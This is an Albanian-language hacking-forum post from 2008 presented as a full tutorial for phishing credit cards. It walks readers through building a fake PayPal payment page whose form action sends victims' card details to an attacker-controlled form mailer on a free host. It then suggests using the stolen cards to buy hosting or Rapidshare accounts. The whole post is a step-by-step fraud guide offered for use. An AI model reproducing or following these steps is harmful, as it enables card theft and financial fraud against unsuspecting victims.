ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Hacko Credit Cards (FULL TUTORIAL) || PHISHING ||

Shko poshtë 
AutoriMesazh
N!T!
V.I.P.
V.I.P.
avatar

Numri i postimeve : 153
Age : 22
Nga Jeni : strellci
Registration date : 20/12/2008

MesazhTitulli: Hacko Credit Cards (FULL TUTORIAL) || PHISHING ||   Sun Dec 21, 2008 10:33 am

Hap nje Paypal Account
Shko tek Mechant Tools eshte nje seksion per te krijuar Buttona per Webfaqe eshte nje donate Button, nese klikon ne me shume opcione te tjera do te gjesh Find Setting Up Button
Qfare Po Pret Merr HTML Codin ?
Ajo do duket perafersisht Keshtu :


Kodi:
rapidshare.com Buy_Code.txt.htmlKet do ta editojme me vone !!
Tani eshte koha qe te bejme Phishing per me Vjedh CC
Ruaje kete textin me poshte si html pasi ta kesh edituar dhe me pas uploado ne nje free host !!


Kodi:
rapidshare.com Pay.txt.htmlVetem ne kete pjesen me poshte duhet ta editojme


Kodi:
<form action="http://www.big-llc.com/formmailer/submit"
Pasi ta kesh edituar ruje so Pay.html dhe uploado ne nje freehost
Tani linku yt i uploadimit do duket keshtu :


Kodi:
www.domainiyt.com/pay.htmlTani kthehu tek linku i pare qe e more prej Paypal dhe zevendeso me kete link


Kodi:
https://www.paypal.com/cgi-bin/webscrTani Ruaje ate diku ne html dhe kur viktima klikon ne Buy Now per te donatuar per Paypal te dhenat e CC-se do te vijne ne kete linkun


Kodi:
www.domainiyt.com/pay.htmlDhe me pas Blej Host a Rapidshare Account Me ato CC-ja
Me kaq Perfundon Ky Tutorial
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.dj-niti-a.piczo.com
 
Hacko Credit Cards (FULL TUTORIAL) || PHISHING ||
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Hacking-
Kërce tek: